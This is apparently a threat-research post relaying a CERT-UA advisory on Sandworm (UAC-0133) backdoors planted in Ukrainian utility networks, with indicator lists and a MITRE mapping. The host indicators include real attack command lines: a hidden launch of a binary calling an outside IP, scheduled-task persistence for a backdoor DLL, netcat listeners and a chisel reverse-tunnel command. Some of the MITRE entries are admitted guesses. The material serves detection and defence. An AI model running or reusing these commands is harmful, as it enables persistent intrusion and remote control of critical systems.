Threat Research

UAC-0133 (Sandworm) plans for cyber sabotage on almost 20 objects of critical infrastructure of Ukraine

admin

General Information

In March 2024, the government computer emergency response team of Ukraine CERT-UA revealed a malicious plan of the Sandworm group, aimed at disrupting the stable functioning of the information and communication systems (ICS) of about twenty energy, water and heat supply (OKI) enterprises in ten regions of Ukraine.

In addition to the QUEUESEED (KNUCKLETOUCH, ICYWELL, WRONGSENS, KAPEKA) backdoor known since 2022, new malicious tools, namely LOADGRIP and BIASBOAT (Linux variant of QUEUESEED) were installed during the emergency response on a computer (Linux OS) designed for the automation of processes of technological process management (ASUTP) using specialized software (SPZ) of domestic production. It should be noted that BIASBOAT was presented in the form of a file encrypted for a specific server, for which the attackers used the previously obtained “machine-id” value.

CERT-UA specialists have confirmed the facts of the compromise of at least three “supply chains”, in connection with which the circumstances of the initial unauthorized access are either correlated with the installation of the SDR, which contained software bookmarks and vulnerabilities, or were caused by the full-time technical ability of the supplier’s employees to access the ICS organizations for support and technical support.

Taking into account the operation of PCs with SDRs within the ICS of OKI, criminals used them for horizontal movement and development of cyberattacks in relation to corporate networks of enterprises. For example, a pre-created PHP web shell WEEVELY, a PHP tunnel REGEORG.NEO or PIVOTNACCI were detected in the directories from the SDR on such computers.

In the period from 07.03.2024 to 15.03.2024, CERT-UA specialists took measures to inform all identified enterprises and investigate and counter cyber threats in the relevant ICS, as part of which the circumstances of the primary compromise were established, malicious software was removed and analyzed, a chronology of the incident was constructed, assistance was provided in the configuration of server and active network equipment, and security technology was installed (in some enterprises, LOADGRIP/BIASBOAT was created in 2023).

It should be emphasized that malicious software QUEUESEED and GOSSIPFLOW were used by the attackers on PCs running Windows OS, which have been tracked since 2022 in the context of destructive cyber attacks by the UAC-0133 group on water supply facilities, in particular, using SDELETE. Thus, with a high level of confidence, UAC-0133 is a subcluster of UAC-0002 (Sandworm/APT44).

Note that the following factors contributed to the implementation of cyber attacks:

  • incorrect segmentation (lack of isolation) of servers from the SDR of suppliers, used as an element of the ACS, in the context of both limiting access from/to the Internet and the ICS of the organizations themselves, within which they function
  • negligent attitude of suppliers to the security of software provided to consumers; in particular, during a superficial analysis of the source code, banal vulnerabilities that allow remote code execution (RCE) will be revealed.

CERT-UA assumes that the unauthorized access to the ICS of a significant number of heat, water and energy supply facilities was to be used to enhance the effect of missile strikes on infrastructure facilities of Ukraine in the spring of 2024.

QUEUESEED is a malicious program developed using the C++ programming language. Gets basic information about the computer (OS, language, user name), executes commands received from the management server and sends the result. Functions: read/write files, execute commands (as a separate process or via %COMSPEC% /c), update configuration, self-delete. HTTPS is used for interaction with the management server. Data is transmitted in JSON format and encrypted using RSA+AES. The configuration file of the backdoor, which, in particular, contains the URL of the management server, is encrypted using AES (the key is statically set in the program). A queue of unprocessed incoming commands/results is implemented – it is stored in the Windows registry in AES-encrypted form (the %MACHINEGUID% value is used as the key). Backdoor persistence is provided by a dropper that creates a corresponding scheduled task or entry in the “Run” branch of the Windows registry.

BIASBOAT – a malicious program (ELF) developed using the C programming language is a Linux variant of QUEUESEED. Launching on a computer is carried out using the LOADGRIP injector.

LOADGRIP is a malicious program (ELF) developed using the C programming language. The main functionality is launching the payload by injection using the ptrace API. The payload is usually presented in an encrypted form (AES128-CBC), and the key for its decryption is formed on the basis of the constant statically entered in the code and the “machine-id” value of the computer.

GOSSIPFLOW is a malicious program developed using the Go programming language. Provides tunnel construction (uses Yamux multiplexer library) and performs SOCKS5 proxy functionality.

In addition to the mentioned software tools for the implementation of cyber threats, the group also used, but not exclusively:

  • CHISEL
  • LIBPROCESSHIDER
  • JUICYPOTATONG
  • ROTTENPOTATONG

Indicators of cyber threats

Files :

  • 4d45d7b60c10c66977f1a593aa36cea7 e165c210a6d7366e2c78e5371d02e3345c25fb75393b7d7e9dc9a8fa737e74d4 r.bat
  • d58153d94e6b9b331ad2b0f0ce51743a 744364ea94245c26aabfdedc4a6fae2e2d188fbe3c851f439b27ed8a9084a9d1 r3.bat
  • 9ddb6f9dca2d946de295d40af0f35948 350ee0a029eae1d4e4c3d9131a1b32071db9a735326022a565685a9f1521ab73 k.bat
  • 6b0b5c00362339fc5a912eae413b7f1f c13270594f873bb188f893f307d1ec94aa21ee4c3b90301e168eec3a21a055ca r1.bat
  • 1938a3545517650824657fd09ce4ee16 602dbcf4008c585582d5e5d5c8ddb1932fdee07a14308e9cbf937904f31df1f7 jp.exe (JUICYPOTATONG)
  • cf85ceea940ae5f2cc0ee0a9fc23d5c8 ce85f5bcd52c79582a66bc7ef3f11f4ac74e9cc9962551b5912ac6bfa78ea841 msd.exe (dump LSASS)
  • a048daae363e6cbe9a191d7189733ea4 6ea79c94ed790093341b1a479eb31bdf7368e3c891501aa2ce18acc71b318c96 rp.exe (ROTTENPOTATONG)
  • 691c1fb1a80f1d4c502753d656e72c32 ccb9edfa233328c3351bd3a46fec037aeb27b3a74779c2bbb738e9e108c33e76 fp.exe (creating scheduled tasks for files through COM objects)
  • 50b5582904fe34451f5cb2362e11cb24 bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f crdss.exe (QUEUESEED dropper)
  • 5294aaf2ff80547172ebb9e0bcb52e0f f30b9f6e913798ca52154c88725ee262a7bf92fe7caac1ae2e5147e457b9b08a lunose.wll (QUEUESEED)
  • 58504fc65456f2d932173446e15b1799 8685a79ff9e0b1b4a6372c6cd1cafcc9c72e12b83f782466f17c350f2d12184a hasuti.wll (QUEUESEED)
  • 12b4ee7b8a55046520dd1e1dd388bf47 4571860df3a7c8f67db93bd038c1847ddda5ef4b0b23e631d814778ab7a5d549 ntuser.exe.exe (GOSSIPFLOW)
  • fb9e2fc411c17160b97ab5abfcef7c55 8369d112dc42151ceb3aaa6eca96fb66a08e631a2f18860d716a0604a80da76c opf.sh
  • 963ea514ef1b047e99cc90503f16b2c5 4e6582b8ff2fb2e91cc31de2f4ed4f72ef7ac52845d4dbfabf36081d849bba64 opf.sh
  • b80d7cb828535ec1ef6e27e5d5f2d2cd 5fdb577b5ce71c42032c77cf41b3a4478726dff5a234abd0a26ff0bdd42e4ef9 opf.sh
  • 97608532187c8df1abb17156e4d99ee2 4a4dde90762accb8d61caad9923f1473c6d8ee493c7dc6c482dfd52c9f8fc2f5 zkj.sh
  • 9769f67f2189ac32307600a2387e28f7 3f5044eb9f2ae3f46d6b64d56e3a37248ea21a340d4cbb42ba8a809f7c75824b fcm.sh
  • 09fe0ab36d7c16108456c60eb56a09c7 d3f97c3df60da89fc68c722140b6a6c9cc8bfc27ac3e442b5fdcfdfcdbd34e87 crm.sh
  • cdacfee7c1122983c9394de44493c542 459c676115ad0e363697fda048e7f38c5fa5bb002e3dcdab98d7c93cb61948b3 vuu.sh
  • 48656739fe14c0d70f11f65f67f86de5 dc31de076eb9b2407bc4e7fa44216f906f0857271d71a2ea2fb6f35c96cd8f35 ktc.sh
  • 6993aa0b81fb20d706c00ecf764ce3f2 5557aea34234deb015d8e6c39ea2945bad6dd4e9dfe5278265c1183aa3942394 nfs.sh
  • 0d2363b184e35c0f005db9b40e2cd76c 2239aa7e5765b810009c73a43d6df5526c4c42c31e45d7ae181642dabe2c4d94 wzo.sh
  • a39a4125e48ce614b44fea879454a0f8 4e568242667c61a1551d3e5f3e42107c43db5d989647b333325d10840cd2d58e qhv.sh
  • ed7620864bd720c8cf79e63ec4e679d6 155cd259e21c1dc3b6978f528e9d13a55483336c5d3c12d5b801dca720f443b7 nyc.sh
  • be43644bdf06e8b740ce31c82f4f8bb2 ff6c150364312afd54d37f891da02542756a8036698a0911ab8e32d4e0dea030 kpv.sh
  • 82f7464ec5921ab94656bd4bff58708f feae0ab35affa24c52650c9da789cf214d4f7c37bdef3e4d0412feb4aaa3b4db opf.sh
  • 715fcd523ffceafb970679099b21c55e 270b478209df6ecdd54b4cd7fcba79d30647f83c98f0668795ece81b39d7c629 psk.sh
  • 5ff34c5296a5b170ba86f5a9c1222fca bdd7b08ab069c71877352e4cf7cf0e1e14b14ccffd3fb827a81ed6fc564ff99b bir.elf (BIASBOAT; decrypted)
  • 4e23243e3e2ce4d234034fe163d4d095 77c7db28deb338378367fd9d50e09cc2ef8d7143a11fd0f03eb1bab96e6411fa eso.elf (BIASBOAT; decrypted)
  • f05aec3e7ea30b93ea11e3cc8b998ca5 9975cfa490c372012364c110a7f249d5c812b0afd84a38ed71821dc56c15b29f sdo.elf (BIASBOAT; decrypted)
  • 5fad6d88dc503f59adfa767e11985ff1 01208ced0bd6bf8b72bbf09ec47ddb52014f56d31bf764184bb35134be873c62 qqa.elf (BIASBOAT; decrypted)
  • 3bee971f994f21779c3bc7e07f7029be 645821ba80859651cdb8c1c1f8129702a85503c62b0c3ce74f99d50214f67244 jjh.elf (BIASBOAT; decrypted)
  • 0b0f1f38f85827b4753c0cfc95ee9dc9 ea415d89592b55402c1ac66fa934bd31ec17456407ac4adb2e72f9bc6f5061af lpq.elf (BIASBOAT; decrypted)
  • 2574bd88088e3437a183016e59302928 06584cc9f5bc80964b80220064dda52e822e81ad1d0053f4390ca1433c64971b oat.elf (BIASBOAT; decrypted)
  • 31d5165a9d83c3ea370c2cd262fbba6f d5620b21a02934aafb2caeaec0f0472adac185f60fc06ee5e97c60cc5cec25ac rgp (LOADGRIP)
  • 087e6a5bf9bafac4b5c7fcc0ab0201f1 9a76e608afca114f18e2b794e9a557b910f43e575c816019a49876188602c3aa kkd (LOADGRIP)
  • ea2161085f0c5a7a67ab245513ff5162 63939d3bd170846a95b124c09a4b6399ab1e790d0c2f407141de9265efc51ee9 sxw (LOADGRIP)
  • 3d7c4521233b9d9dd6a150c26b5fcc68 1800fcac02899d6d4d9f5f0b15a57a140abb29d6f4877f133d57b3e60eaf66c3 bir
  • 8ab0e9251fe39a6d9ef36d0548476654 1180d7a61dbf718f092b3f9dc63c32e1d0228b190c8c254563b6332cab9d7c0e eso
  • 938f05807048a4e9b95bd4eee8c7c1a4 c3859810b9842daf129bc887e7b267ae70ba985387b1cea0fc62270c74c3d4a6 qqa
  • 064c252bc5ee2395fb82aa7c0e599d3a 343e50eed373fa970545785eeace049ead8bd24a1062d6fcf589a629323532ca jjh
  • fbe469cbe4c1a746619b0fad3c3647e7 d8cd22fc4ef77c1b19d189dcb1ced5db6ead68867c51a23deed3cb422ca4412a sdo
  • bdb21d4397f8e76923d6635504a5ada4 a29944006225bb5cb0dacf597ef614cf947a8ac088cec90c954506b38ebdc28e lpq
  • 227b6198541178db566714c503dab36e 8a7b3a7a9a4e8b7fd45c94b56ac59f6e15b6560f692756cf6050342bea06a1b3 oat
  • dee2d8477084747edf37026dade1a827 fa6439c50f2187da3c4c594f0e53037637184167f3e55a7aa2766e8a3b7d55f0 vjr
  • 7055dce07c716aa2429001dae97633fb d436d509d00d89bf118f2f06bde24bdaaa03e083a514e11fbe000f4c2a81f136 ajh
  • 3e9022ce46fdccab4e40d1e01a8addb4 f3280e61f7c810457b8c6741aa57bdceb1dd918d18f16d314761a49788665877 lws
  • 63ee45adf7d1fe4acd5b1632bbadd873 0d898a405e641797c42a1c39a22740462e3a5ebaa092199005f2b2e505bf5e42 jpt
  • b53e37e7a414872ec3d33d36c0bc1e81 09fb7feb2b209f79d5ffb855b63037ca8cd8449dd168199a23f15ca9f6a454ea bir
  • 3eeebd90a6ea0d60b10eeac1da2d735c 335d36ba132c292c255c520f09a7eba9ff585d52486f259eff43989658727f4f ijs
  • d597d341ade717dd73a443172458fc86 52faa381392c1a86b537096c2730de5aeab9be7512bde9536aef84857b19753e meter.php (WEEVELY)
  • d59c63ddb629773aded9c85e472d67e3 a97252c1a675d3c64dc806181e64f0a0e86914a540476b08cc578d94759ee082 _backup_dataform.php (WEEVELY)
  • c998ac471420f48ec121050068972d47 1dbb018010a79d869f9a3f61907f81e61e15a366efe7302e26d93946754cd311 man.php (WEEVELY)
  • b1c30d0f77386b42cefa8f10d0a98576 7cddf5eabb6e59b9901e6a68996413e3469f8c56b4da92cf24c18862221c3046 preload.php (WEEVELY)
  • 38f3f5ccb8906940282d0046583d318e c4285344547b314c431ab6226612b2b14f62beb45c6feb91c8fcfa17d7031d98 jspdf.php (WEEVELY)
  • cd439b12d10428db1d3365ea01361f48 e76f78c5afbd1d1a3fefa7a37d1737f9cb06197f4a6d6dd8f7b74f3978362a9f getformdate.php (WEEVELY)
  • 9ca2c77a5c2f8401dfb67dab34b648cf e6e1e231195f666e8807432f3992e7b1830a3a170229d679933042d3cc1246aa getformdate.php (WEEVELY)
  • 0f359771ef52bf54b2196ce6f8a2642c 29c21a87bed19457f7f76e5f39c818ad563a2ddb203961bb2295263d8e875044 init.php (WEEVELY)
  • 2cfc8ce15a56667074c4b0ca4a11d7f3 6ca881729c4610cb08f0f54fa1ff2ad9a0f56313da8ae5caa3746f8c1cd527b2 settings125.report.php (REGEORG.NEO)
  • 108dddf7f1bc10fafbdc6f11c26b4c5a 3c5e7c6da03c5f66d71332a34b3a1f57fed05d3de624f05dae50f7b14a4e44b3 water.php (REGEORG.NEO)
  • 7f1712c4102e4cfadd1c44d9b29f139d 807bfade291ab71c1bb47ef2c18a52d6db7b7546f28a421edf18ebeae5ad00aa main.php (REGEORG.NEO)
  • e64ec2535335ddd40e2fb53b53e5b5f9 e2551b76534f0646fccbffd01856948b8f440618afd2b17cda6a9ae59e8e28f7 .back_devices_.php (REGEORG.NEO)
  • 7cf92e30acd55232a050fe1cf6eaf2be 27fe2d836d02a72e61b437b170f2ea6285579a6d443334d3cc2e27e77aa26b7f report.php (REGEORG.NEO)
  • 4a7250531376bf48d06547d46a853d60 21897e25ace1e8b4da317cb3ba866a1e22b5211516454596f577cacb435f1455 skm2.php (REGEORG.NEO)
  • 233ceffbb3119df13ceb72f01077c998 622e355f8fe1756447a0cb47d4873a0f8ecb7d46d4705c425a4dc015050ad85b jobs.php (PIVOTNACCI)
  • f8cf05346cba3ccd0cdb28c44e8036a1 d8d3a1c24a12795f0c65509db8b40c26396a51d0dfa258b6fc317e8b2270c5a3 fexport.php (PIVOTNACCI)
  • ed8b9d38fe272f2692b47292e74a0352 cca9accd3c1554703ab11eb9c10b146d9d8a84ea165450003200de1ebbc2ac4c .env (CHISEL)
  • 2c1397f61325d3ab7eee97124ed8dcfa c237f1a3f75b2759f66ec741448bb352e95e186a9a689f87c8641b44a13d878b oscada (CHISEL)
  • 88d7b461ac0c52f95a81090cf0903ebc 61b0246202707414da97911c0447eed70499e02285db9190a5842de748ae0bd1 env.so (LIBPROCESSHIDER)

Hosts :

  • /etc/init.d/crm.sh
  • /etc/init.d/[az]{3}.sh
  • /etc/rc.d/init.d/opf.sh
  • /etc/ld.so.preload
  • /run/systemd/generator.late/opf.service
  • /etc/init.d/.depend.startup
  • /etc/rc.d/init.d/.depend.start
  • /usr/local/etc/rc.d/.depend.start
  • /tmp/.env
  • /usr/local/lib/env.so
  • /usr/sbin/oscada
  • /var/lib/AccountsService/mex
  • /var/lib/Pegasus/bir
  • /var/lib/alternatives/xrr
  • /var/lib/apache2/ajh
  • /var/lib/apt/sdo
  • /var/lib/aspell/akc
  • /var/lib/certmonger/rgp
  • /var/lib/dictionaries-common/kkd
  • /var/lib/dictionaries-common/nzf
  • /var/lib/initramfs-tools/ijs
  • /var/lib/dnf/rgp
  • /var/lib/dpkg/eso
  • /var/lib/lcw
  • /var/lib/lws
  • /var/lib/net-snmp/rgp
  • /var/lib/nfs/bir
  • /var/lib/pam/qqa
  • /var/lib/php/rgp
  • /var/lib/samba/rgp
  • /var/lib/sss/xrr
  • /var/lib/systemd/bir
  • /var/lib/systemd/jpt
  • /var/lib/systemd/uoj
  • /var/lib/ubuntu-advantage/pml
  • /var/lib/ucf/ero
  • /var/lib/ucf/lox
  • /var/lib/ucf/riq
  • /var/lib/xml-core/jjh
  • /var/lib/aspell/akc -e /var/lib/dpkg/eso -h
  • /var/lib/dictionaries-common/kkd -e /var/lib/xml-core/jjh -h
  • /var/lib/dictionaries-common/lma -e /var/lib/doc-base/oat -h
  • /var/lib/dictionaries-common/nzf -e /var/lib/apache2/ajh -h
  • /var/lib/lcw -e /var/lib/lws -h
  • /var/lib/net-snmp/rgp -e /var/lib/nfs/bir -h
  • /var/lib/pam/sxw -e /var/lib/dictionaries-common/vjr -h
  • /var/lib/php/rgp -e /var/lib/Pegasus/bir -h
  • /var/lib/sss/xrr -e /var/lib/systemd/jpt -h
  • /var/lib/systemd/uoj -e /var/lib/initramfs-tools/ijs -h
  • /var/lib/ubuntu-advantage/pml -e /var/lib/pam/qqa -h
  • /var/lib/ucf/ero -e /var/lib/apt/lpq -h
  • /var/lib/ucf/lox -e /var/lib/apt/sdo -h
  • /var/lib/dls/706f64686a6a7669 (example path for configuration file)
  • /var/lib/[az]{3}/[a-f0-9]{16}
  • /var/www/dokuwiki/inc/preload.php
  • /var/www/dokuwiki/main.php
  • /var/www/html/.back_devices_.php
  • /var/www/html/Scripts/export/jspdf/jspdf.php
  • /var/www/html/Users/Shared/Presets/_backup_dataform.php
  • /var/www/html/getformdate.php
  • /var/www/html/glpi/man.php
  • /var/www/html/glpi/pics/water.php
  • /var/www/html/meter.php
  • /var/www/html/report.php
  • /var/www/html/settings125.report.php
  • /var/www/main/.users.php
  • /var/www/main/Scripts/export/fexport.php
  • /var/www/main/getformdate.php
  • /var/www/modules/init.php
  • /var/www/modules/jobs.php
  • /var/www/veryimage.php
  • /var/tmp/sam.txt
  • /var/tmp/system.txt
  • %PROGRAMDATA%\Microsoft\hasuti.wll
  • %PROGRAMDATA%\fp.exe
  • %PROGRAMDATA%\jp.exe
  • %PROGRAMDATA%\k.bat
  • %PROGRAMDATA%\msd.exe
  • %PROGRAMDATA%\ntuser.exe.exe
  • %PROGRAMDATA%\r.bat
  • %PROGRAMDATA%\r1.bat
  • %PROGRAMDATA%\r2.bat
  • %PROGRAMDATA%\r3.bat
  • %PROGRAMDATA%\rp.exe
  • %PROGRAMDATA%\rs.exe
  • %PROGRAMDATA%\winbox64.exe
  • %PROGRAMDATA%a\ibmsmart.exe
  • %PROGRAMDATA%a\msrsts.doc
  • %PROGRAMDATA%a\ntuser.exe
  • C:\Windows\System32\Tasks\Microsoft\Windows\Sens Api
  • C:\Windows\System32\Tasks\Microsoft\Windows\OneDrive
  • C:\Windows\system32\rundll32.exe “%PROGRAMDATA%\Microsoft\hasuti.wll”, #1
  • %PROGRAMDATA%\Microsoft\lunose.wll
  • %COMSPEC% /c %APPDATA%\pizi.bat
  • %COMSPEC% /c schtasks /create /sc ONSTART /tn “Sens Api” /f /np /tr %WINDIR%\system32\rundll32.exe %PROGRAMDATA%\Microsoft\lunose.wll, #1
  • D:\xampp\htdocs\msd.bat
  • D:\xampp\htdocs\postgis.php
  • D:\xampp\htdocs\r.exe
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Sens Api
  • Global\BFE_Notify_Event_%PROFILEGUID%
  • HKCU\Software\Microsoft\Cryptography\Providers\%PROFILEGUID%\’Seed’
  • Start-Process -WindowStyle hidden “%PROGRAMDATA%a\ibmsmart.exe -c 185.153.199.43:50443
  • cmd /c start “” C:\Windows\system32\rundll32.exe “%PROGRAMDATA%\Microsoft\hasuti.wll”, #1
  • nc -lnvp 7632
  • nc -lnvp 7633
  • oscada server -p 56743 –reverse &
  • taskkill /F /IM rp.exe

Network :

  • 185.38.150.8
  • 165.231.34.106
  • 178.250.188.114
  • 185.225.114.90
  • 193.189.100.203
  • 194.61.121.211
  • 195.154.182.165
  • 196.245.156.154
  • 196.245.156.34
  • 88.80.145.239
  • 91.92.137.6
  • 5.45.75.45
  • 5.45.74.11
  • 195.154.166.87
  • 185.153.199.43
  • 91.92.137.164
  • https://185.38.150.8:443/star/key
  • http://178.250.188.114/ubuntu/focal
  • http://185.225.114.90/accept
  • http://194.61.121.211/application
  • http://195.154.182.165/checkhealth
  • http://196.245.156.154/map/title
  • http://91.92.137.164/json
  • https://165.231.34.106/users/me
  • https://178.250.188.114/ubuntu/focal
  • https://185.225.114.90/accept
  • https://194.61.121.211/application
  • https://195.154.182.165/checkhealth
  • https://196.245.156.154/map/title
  • https://91.92.137.164/json

Graphic images

Fig. 1 Example of a scheduled task for running QUEUESEED

Fig. 2 Example of a BASH script for launching LOADGRIP/BIASBOAT

https://cert.gov.ua/article/6278706

MITRE TTP :

  1. Supply Chain Compromise (T1195): The attackers compromised the software distribution network (SDR), which contained software with embedded vulnerabilities or backdoors. This allowed initial access into the systems used by the energy, water, and heating supply enterprises.
  2. Spearphishing with Malware (T1566.002): Although not explicitly mentioned, the description suggests tactics that might involve spearphishing to deliver malware, considering the use of software vulnerabilities and possible interaction with supplier employees.
  3. Exploit Public-Facing Application (T1190): The vulnerabilities in the software supplied to consumers could be exploited remotely, providing a method for gaining initial access to the network.
  4. Command and Scripting Interpreter (T1059): The use of PowerShell and PHP scripting tools like WEEVELY and REGEORG.NEO implies the attackers’ utilization of script interpreters to execute arbitrary commands or scripts.
  5. Persistence (T1547, T1053): The attackers ensured their continued access to the compromised systems through methods like creating scheduled tasks and registry “Run” entries, common persistence techniques.
  6. Privilege Escalation (T1068): The use of software with embedded vulnerabilities likely provided escalated privileges within the compromised systems.
  7. Defense Evasion (T1027): The attackers employed encryption (RSA+AES for QUEUESEED and AES for BIASBOAT) to hide their data transmissions and backdoor configurations, evading detection.
  8. Credential Access (T1003): Although not specified, the nature of the attack suggests that credential access could have been attempted, for example, through the exploitation of software vulnerabilities to extract credentials from the compromised systems.
  9. Discovery (T1082): QUEUESEED’s functionality to gather basic information about the computer (OS, language, username) indicates the use of discovery techniques to understand the environment and plan further actions.
  10. Lateral Movement (T1021): The attackers utilized the compromised systems for horizontal movement within the network, particularly highlighted by the movement between PCs with different operating systems (Windows and Linux).
  11. Command and Control (T1071, T1090): The use of HTTPS and SOCKS5 proxy functionality by GOSSIPFLOW, and JSON formatted data transmissions, indicates sophisticated command and control capabilities.
  12. Impact (T1499): The goal of enhancing the effect of missile strikes by disrupting key infrastructural services points to a direct intention to cause disruptive impacts.
  13. Software Discovery (T1518): Attackers possibly used techniques to identify and exploit specific software installed on the target systems, especially given the targeted nature of the software vulnerabilities.
  14. Injection (T1055): LOADGRIP used the ptrace API for injection, which is a common method for running malicious code in the context of another process.
Tags: EXPLOIT, IMPACT, PRIVILEGE, LATERAL MOVEMENT, CREDENTIAL, DISCOVERY, DEFENSE EVASION, PERSISTENCE